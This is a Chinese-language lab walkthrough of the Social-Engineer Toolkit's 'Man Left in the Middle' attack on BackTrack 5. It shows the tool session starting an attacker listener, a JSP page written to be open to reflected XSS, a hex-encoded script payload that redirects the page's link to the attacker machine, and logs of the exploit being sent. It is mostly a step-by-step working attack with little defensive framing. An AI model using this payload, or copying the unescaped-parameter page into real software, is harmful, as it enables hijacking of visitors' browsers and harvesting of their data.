Man Left in the Middle Attack Method中间人攻击

操作如下：

root@bt:/pentest/exploits/set# ./set
                    :::===  :::===== :::====
                    :::     :::      :::====
                     =====  ======     ===  
                        === ===        ===  
                    ======  ========   ===  


  [---]        The Social-Engineer Toolkit (SET)         [---]        
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                  Version: 3.6                    [---]
  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
  [---]        Report bugs: davek@trustedsec.com         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]       Homepage: https://www.trustedsec.com       [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    Join us on irc.freenode.net in channel #setoolkit

  The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1




                  _______________________________
                 /   _____/\_   _____/\__    ___/
                 \_____  \  |    __)_   |    |   
                 /        \ |        \  |    |   
                /_______  //_______  /  |____|   
                        \/         \/            

  [---]        The Social-Engineer Toolkit (SET)         [---]        
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                  Version: 3.6                    [---]
  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
  [---]        Report bugs: davek@trustedsec.com         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]       Homepage: https://www.trustedsec.com       [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    Join us on irc.freenode.net in channel #setoolkit

  The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

set> 2

 The Web Attack module is  a unique way of utilizing multiple web-based attacks
 in order to compromise the intended victim.

 The Java Applet Attack method will spoof a Java Certificate and deliver a 
 metasploit based payload. Uses a customized java applet created by Thomas
 Werth to deliver the payload.

 The Metasploit Browser Exploit method will utilize select Metasploit
 browser exploits through an iframe and deliver a Metasploit payload.

 The Credential Harvester method will utilize web cloning of a web-
 site that has a username and password field and harvest all the 
 information posted to the website.

 The TabNabbing method will wait for a user to move to a different
 tab, then refresh the page to something different.

 The Man Left in the Middle Attack method was introduced by Kos and 
 utilizes HTTP REFERER's in order to intercept fields and harvest 
 data from them. You need to have an already vulnerable site and in-
 corporate <script src="http://YOURIP/">. This could either be from a
 compromised site or through XSS.

 The Web-Jacking Attack method was introduced by white_sheep, Emgent 
 and the Back|Track team. This method utilizes iframe replacements to 
 make the highlighted URL link to appear legitimate however when clicked 
 a window pops up then is replaced with the malicious link. You can edit
 the link replacement settings in the set_config if its too slow/fast.

 The Multi-Attack method will add a combination of attacks through the web attack
 menu. For example you can utilize the Java Applet, Metasploit Browser,
 Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
 all at once to see which is successful.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Victim Web Profiler
   9) Create or import a CodeSigning Certificate

  99) Return to Main Menu

set:webattack>5
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address for the reverse connection:192.168.1.11

***************************************************
  Web Server Launched. Welcome to the SET MLTM.
***************************************************
Man Left in the Middle Attack brought to you by:
Kyle Osborn - kyle@kyleosborn.com

Starting server on 0.0.0.0:80...
[*] Server has started

开始监听了。

然后，我制作了网页xss.jsp：

<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
</head>
<body>
<%
	String name = request.getParameter("name");
%>
Welcome, <%=name %><br>
<a href="#">Visit here</a>
</body>
</html>

访问URL：

http://192.168.1.109:8080/xss/xss.jsp?name=yang%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6F%6E%6C%6F%61%64%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%20%7B%76%61%72%20%6C%69%6E%6B%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%22%61%22%29%3B%6C%69%6E%6B%5B%30%5D%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%2E%31%31%2F%22%3B%7D%3C%2F%73%63%72%69%70%74%3E

后面那些看不懂的东西，其实是：

<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://192.168.1.11/";}</script>

我把它从ASCII转变成了十六进制表示。

192.168.1.109是XP，192.168.1.11是BT5。

在XP上访问URL，如图所示：

看到上面的地址栏，js是明文的，但是如果是IE，则不是。

Visit here的URL如下：

现在点击“Visit here”，如图：

在BT上输出如下：

[-] Incoming connection from 192.168.1.142
192.168.1.142 - - [28/Apr/2013 06:14:45] "GET / HTTP/1.1" 200 -
[-] Grabbing payload from http://192.168.1.109:8080/xss/xss.jsp?name=yang%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6F%6E%6C%6F%61%64%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%20%7B%76%61%72%20%6C%69%6E%6B%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%22%61%22%29%3B%6C%69%6E%6B%5B%30%5D%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%2E%31%31%2F%22%3B%7D%3C%2F%73%63%72%69%70%74%3E
[-] Exploit sent to 192.168.1.142

但是，如果没有referer，那么BT5会输出：

[-] Incoming connection from 192.168.1.142
[!] No referer

背景知识：

HTTP Referer是header的一部分，当浏览器向web服务器发送请求的时候，一般会带上Referer，告诉服务器我是从哪个页面链接过来的，服务器籍此可以获得一些信息用于处理。